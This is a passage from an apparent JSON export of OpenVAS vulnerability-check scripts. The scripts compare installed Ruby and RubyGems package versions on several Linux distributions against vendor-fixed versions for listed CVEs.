rpm:\"ruby2.1-debuginfo~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-debugsource\", rpm:\"ruby2.1-debugsource~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-devel\", rpm:\"ruby2.1-devel~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-devel-extra\", 
rpm:\"ruby2.1-devel-extra~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-doc\", rpm:\"ruby2.1-doc~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-stdlib\", rpm:\"ruby2.1-stdlib~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-stdlib-debuginfo\", rpm:\"ruby2.1-stdlib-debuginfo~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-doc-ri\", rpm:\"ruby2.1-doc-ri~2.1.9~8.3.2\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_1-2_1\", rpm:\"libruby2_1-2_1~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_1-2_1-debuginfo\", rpm:\"libruby2_1-2_1-debuginfo~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1\", rpm:\"ruby2.1~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-debuginfo\", rpm:\"ruby2.1-debuginfo~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-debugsource\", rpm:\"ruby2.1-debugsource~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-devel\", rpm:\"ruby2.1-devel~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-devel-extra\", rpm:\"ruby2.1-devel-extra~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-doc\", rpm:\"ruby2.1-doc~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res 
= isrpmvuln(pkg:\"ruby2.1-stdlib\", rpm:\"ruby2.1-stdlib~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.1-stdlib-debuginfo\", rpm:\"ruby2.1-stdlib-debuginfo~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"uby2.1-doc-ri\", rpm:\"uby2.1-doc-ri~2.1.9~10.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-20T00:00:00", "type": "openvas", "title": "Fedora Update for rubygems FEDORA-2015-13157", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869888", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869888", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygems FEDORA-2015-13157\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869888\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-20 06:42:54 +0200 (Thu, 20 Aug 2015)\");\n script_cve_id(\"CVE-2015-3900\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygems FEDORA-2015-13157\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygems'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygems on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-13157\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-August/164236.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.2.5~100.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:36:36", "description": "Mageia Linux Local Security Checks mgasa-2015-0345", "cvss3": {}, "published": "2015-10-15T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0345", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310130042", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130042", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0345.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130042\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:41:54 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0345\");\n script_tag(name:\"insight\", value:\"Updated ruby-RubyGems package fixes security vulnerability: RubyGems does not validate the hostname when fetching gems or making API request, which allows remote attackers to redirect requests to arbitrary domains via a crafted DNS SRV record, aka a DNS hijack attack (CVE-2015-3900).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0345.html\");\n script_cve_id(\"CVE-2015-3900\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0345\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"ruby-RubyGems\", rpm:\"ruby-RubyGems~2.1.11~5.1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-11T00:00:00", "type": "openvas", "title": "Fedora Update for rubygems FEDORA-2015-12574", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869851", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869851", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygems FEDORA-2015-12574\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869851\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-11 06:35:29 +0200 (Tue, 11 Aug 2015)\");\n script_cve_id(\"CVE-2015-3900\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygems FEDORA-2015-12574\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygems'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygems on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-12574\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163600.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygems\", rpm:\"rubygems~2.4.8~100.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-20T19:39:45", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-07-26T00:00:00", "type": "openvas", "title": "Ubuntu Update for ruby2.3 USN-3365-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5147", "CVE-2016-2337", "CVE-2015-1855", "CVE-2016-2339", "CVE-2015-7551", "CVE-2016-7798", "CVE-2015-9096"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310843256", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843256", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for ruby2.3 USN-3365-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843256\");\n script_version(\"2019-12-20T08:10:23+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 08:10:23 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-26 07:16:30 +0200 (Wed, 26 Jul 2017)\");\n script_cve_id(\"CVE-2009-5147\", \"CVE-2015-1855\", \"CVE-2015-7551\", \"CVE-2015-9096\",\n \"CVE-2016-2337\", \"CVE-2016-2339\", \"CVE-2016-7798\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for ruby2.3 USN-3365-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby2.3'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that Ruby DL::dlopen\n incorrectly handled opening libraries. An attacker could possibly use this issue\n to open libraries with tainted names. This issue only applied to Ubuntu 14.04\n LTS. (CVE-2009-5147) Tony Arcieri, Jeffrey Walton, and Steffan Ullrich\n discovered that the Ruby OpenSSL extension incorrectly handled hostname wildcard\n matching. This issue only applied to Ubuntu 14.04 LTS. (CVE-2015-1855) Christian\n Hofstaedtler discovered that Ruby Fiddle::Handle incorrectly handled certain\n crafted strings. An attacker could use this issue to cause a denial of service,\n or possibly execute arbitrary code. 
This issue only applied to Ubuntu 14.04 LTS.\n (CVE-2015-7551) It was discovered that Ruby Net::SMTP incorrectly handled CRLF\n sequences. A remote attacker could possibly use this issue to inject SMTP\n commands. (CVE-2015-9096) Marcin Noga discovered that Ruby incorrectly handled\n certain arguments in a TclTkIp class method. An attacker could possibly use this\n issue to execute arbitrary code. This issue only affected Ubuntu 14.04 LTS.\n (CVE-2016-2337) It was discovered that Ruby Fiddle::Function.new incorrectly\n handled certain arguments. An attacker could possibly use this issue to execute\n arbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-2339) It\n was discovered that Ruby incorrectly handled the initialization vector (IV) in\n GCM mode. An attacker could possibly use this issue to bypass encryption.\n (CVE-2016-7798)\");\n script_tag(name:\"affected\", value:\"ruby2.3 on Ubuntu 17.04,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3365-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3365-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"libruby2.0:amd64\", ver:\"2.0.0.484-1ubuntu2.4\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libruby2.0:i386\", ver:\"2.0.0.484-1ubuntu2.4\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby2.0\", ver:\"2.0.0.484-1ubuntu2.4\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby2.3\", ver:\"2.3.3-1ubuntu0.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby2.3\", ver:\"2.3.3-1ubuntu0.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby2.3\", ver:\"2.3.1-2~16.04.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby2.3\", ver:\"2.3.1-2~16.04.2\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-04T17:34:49", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-04-06T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for ruby2.2 (openSUSE-SU-2017:0933-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2339", "CVE-2015-7551"], "modified": "2020-06-03T00:00:00", "id": "OPENVAS:1361412562310851531", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310851531", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851531\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-04-06 06:33:15 +0200 (Thu, 06 Apr 2017)\");\n script_cve_id(\"CVE-2015-7551\", \"CVE-2016-2339\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for ruby2.2 (openSUSE-SU-2017:0933-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby2.2'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for ruby2.2, ruby2.3 
fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new'initialize' (boo#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (boo#959495)\n\n Detailed ChangeLog are linked in the references.\");\n\n script_xref(name:\"URL\", value:\"http://svn.ruby-lang.org/repos/ruby/tags/v2_2_6/ChangeLog\");\n script_xref(name:\"URL\", value:\"http://svn.ruby-lang.org/repos/ruby/tags/v2_3_3/ChangeLog\");\n\n script_tag(name:\"affected\", value:\"ruby2.2, on openSUSE Leap 42.2, openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:0933-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_2-2_2\", rpm:\"libruby2_2-2_2~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_2-2_2-debuginfo\", rpm:\"libruby2_2-2_2-debuginfo~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_3-2_3\", rpm:\"libruby2_3-2_3~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_3-2_3-debuginfo\", rpm:\"libruby2_3-2_3-debuginfo~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"ruby2.2\", rpm:\"ruby2.2~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-debuginfo\", rpm:\"ruby2.2-debuginfo~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-debugsource\", rpm:\"ruby2.2-debugsource~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-devel\", rpm:\"ruby2.2-devel~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-devel-extra\", rpm:\"ruby2.2-devel-extra~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-doc\", rpm:\"ruby2.2-doc~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-stdlib\", rpm:\"ruby2.2-stdlib~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-stdlib-debuginfo\", rpm:\"ruby2.2-stdlib-debuginfo~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-tk\", rpm:\"ruby2.2-tk~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-tk-debuginfo\", rpm:\"ruby2.2-tk-debuginfo~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3\", rpm:\"ruby2.3~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-debuginfo\", rpm:\"ruby2.3-debuginfo~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-debugsource\", rpm:\"ruby2.3-debugsource~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-devel\", rpm:\"ruby2.3-devel~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-devel-extra\", rpm:\"ruby2.3-devel-extra~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-doc\", rpm:\"ruby2.3-doc~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-stdlib\", rpm:\"ruby2.3-stdlib~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-stdlib-debuginfo\", rpm:\"ruby2.3-stdlib-debuginfo~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-tk\", rpm:\"ruby2.3-tk~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-tk-debuginfo\", rpm:\"ruby2.3-tk-debuginfo~2.3.3~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-doc-ri\", rpm:\"ruby2.2-doc-ri~2.2.6~6.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.3-doc-ri\", 